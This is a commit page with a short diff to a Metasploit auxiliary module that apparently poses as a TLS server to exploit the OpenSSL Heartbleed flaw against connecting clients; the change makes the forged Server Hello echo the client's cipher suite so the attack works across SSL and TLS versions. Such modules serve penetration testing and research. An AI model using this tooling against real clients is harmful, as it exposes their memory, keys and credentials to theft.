Use the first cipher suite sent by the client

If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the first cipher suite sent by the client. This complements the last commit and makes this module work with SSLv3, TLSv1.0, TLSv1.1, and TLSv1.2 when NEGOTIATE_TLS is not enabled (see https://gist.github.com/rcvalle/10335282).
2014-04-12 05:05:14 -03:00 · 2014-04-12 05:05:14 -03:00 · 039946e8d1
parent b95fcb9610
commit 039946e8d1
1 changed files with 9 additions and 1 deletions
--- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
+++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
@ -300,6 +300,14 @@ class Metasploit3 < Msf::Auxiliary
  # Send an OpenSSL Server Hello response
  def openssl_send_server_hello(c, hello, version)

+    # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the
+    # first cipher suite sent by the client.
+    if @state[c][:encrypted]
+      cipher = "\x00\x2F"
+    else
+      cipher = hello[46, 2]
+    end
+
    # Create the Server Hello response
    extensions =
      "\x00\x0f\x00\x01\x01"       # Heartbeat
@ -308,7 +316,7 @@ class Metasploit3 < Msf::Auxiliary
      [version].pack('n') +        # Use the protocol version sent by the client.
      @state[c][:server_random] +  # Random (Timestamp + Random Bytes)
      "\x00" +                     # Session ID
-      "\x00\x2F" +                 # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)
+      cipher +                     # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)
      "\x00" +                     # Compression Method (none)
      [extensions.length].pack('n') + extensions